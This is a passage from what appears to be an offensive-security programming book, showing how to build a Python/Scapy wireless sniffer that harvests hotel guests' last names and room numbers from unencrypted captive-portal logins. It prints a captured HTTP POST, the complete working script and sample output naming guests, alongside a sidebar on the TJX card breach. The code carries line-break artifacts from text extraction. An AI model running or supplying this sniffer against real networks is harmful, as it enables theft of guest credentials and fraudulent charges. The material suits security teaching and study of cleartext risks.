Most hotels offer public wireless networks these days. Often these networks fail to encrypt traffic and lack any enterprise authentication or encryption controls. This section examines a scenario where a few lines of Python can exploit this situation and lead to a disastrous disclosure of public information.
Recently, I stayed in a hotel that offered wireless connectivity to guests.
After connecting to the wireless network, my web browser directed me to a web page to log on to the network. The credentials for the network included my last name and hotel room number. After providing this infor-mation, my browser posted an unencrypted HTTP page back to the server to receive an authentication cookie. Examining this initial HTTP post revealed something interesting. I noticed a string similar to PROVIDED_LAST_
NAME=OCONNOR&PROVIDED_ROOM_NUMBER=1337.
The plaintext transmission to the hotel server contained both my last name and hotel room number. The server made no attempt to protect this informa-tion, and my browser simply sent this information in the clear. For this partic-ular hotel, a customer’s last name and room number provided the credentials required to eat a steak dinner in the guest restaurant, receive an expensive massage, or even buy items at the gift shop—so you can imagine that hotel guests would not want an attacker to get a hold of this personal information.
FROM THE TRENCHES
The Demise of the Shadow Crew
In September of 2008, the US District Attorney of Massachusetts indicted Albert Gonzalez for wire fraud, damage to computer systems, access device fraud and aggravated identity theft (Heymann, 2008). Albert Gonzalez (AKA soupnazi) used a wireless sniffer to gain access to the computer systems of the TJX Corporation. At the time, the TJX Corporation encrypted their traffic with the flawed and less secure WEP encryption scheme. This oversight allowed Gon-zalez’s ShadowCrew to intercept and decrypt the wireless traffic. Their wireless sniffer, along with a variety of other techniques, gained access to over 45.7 million customer cards, including compromised cards at BJ Wholesale, DSW, Office Max, Boston Market, Barnes and Noble, Sports Authority and TJ Maxx.
Seven feet tall and a veteran hacker, Steven Watt conspired with the Shadow Crew in their activities. At the time Watt had a budding career writing real-time trading software (Zetter, 2009). For his role in writing the wireless sniffer, the state sentenced Watt to two years in prison and forced him to pay restitution to TJX in the amount of $171.5 million.
The Wall of Sheep—Passively Listening to Wireless Secrets 179
POST /common_ip_cgi/hn_seachange.cgi HTTP/1.1 Host: 10.10.13.37
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1)
AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3 Content-Length: 128
Accept: text/html,application/xhtml+xml,application/
xml;q=0.9,*/*;q=0.8 Origin:http://10.10.10.1 DNT: 1
Referer:http://10.10.10.1/common_ip_cgi/hn_seachange.cgi Content-Type: application/x-www-form-urlencoded
Accept-Language: en-us
Accept-Encoding: gzip, deflate Connection: keep-alive
SESSION_ID= deadbeef123456789abcdef1234567890 &RETURN_
MODE=4&VALIDATION_FLAG=1&PROVIDED_LAST_NAME=OCONNOR&PROVIDED_ROOM_
NUMBER=1337
We can now use Python to capture this information from other hotel guests.
Starting a wireless sniffer in Python is rather simple. First, we will identify our interface to capture traffic. Next, our sniffer listens for traffic using the sniff() function—notice this function filters only TCP traffic and forwards all packets to a procedure named findGuest().
conf.iface = "mon0"
try:
print "[*] Starting Hotel Guest Sniffer."
sniff(filter="tcp", prn=findGuest, store=0) except KeyboardInterrupt:
exit(0)
When the function findGuest receives the packet, it determines if the inter-cepted packet contains any personal information. First, it copies the raw contents of the payload to a variable named raw. We can then build a reg-ular expression to parse the last name and room number of the guests.
Notice our regular expression for last names accepts any string that begins with LAST_NAME and terminates with an ampersand symbol (&). The reg-ular expression for the hotel guest’s room number captures any string that begins with ROOM_NUMBER.
def findGuest(pkt):
raw = pkt.sprintf("%Raw.load%")
name=re.findall("(?i)LAST_NAME=(.*)&",raw) room=re.findall("(?i)ROOM_NUMBER=(.*)'",raw)
if name:
print "[+] Found Hotel Guest "+str(name[0])\
+", Room #" + str(room[0])
Putting all this together, we now have a wireless hotel guest sniffer to capture the last name and hotel room number of any guest who connects to the wire-less network. Notice that we need to import the scapy library in order to have the capability to sniff traffic and parse it.
import optparse
from scapy.all import * def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%')
name = re.findall('(?i)LAST_NAME=(.*)&', raw) room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw) if name:
print '[+] Found Hotel Guest ' + str(name[0])+\
', Room #' + str(room[0]) def main():
parser = optparse.OptionParser('usage %prog '+\
'-i<interface>')
parser.add_option('-i', dest='interface',\
type='string', help='specify interface to listen on') (options, args) = parser.parse_args()
if options.interface == None:
printparser.usage exit(0)
else:
conf.iface = options.interface try:
print '[*] Starting Hotel Guest Sniffer.' sniff(filter='tcp', prn=findGuest, store=0) except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
Running our hotel sniffer program, we see how an attacker can identify several guests staying in the hotel.
The Wall of Sheep—Passively Listening to Wireless Secrets 181
attacker# python hotelSniff.py -i wlan0 [*] Starting Hotel Guest Sniffer.
[+] Found Hotel Guest MOORE, Room #1337 [+] Found Hotel Guest VASKOVICH, Room #1984 [+] Found Hotel Guest BAGGETT, Room #43434343
I cannot emphasize enough at this time that collection of this information potentially violates several state, federal, and national laws. In the next section, we will further expand our ability to sniff wireless networks by parsing Google searches right out of the air.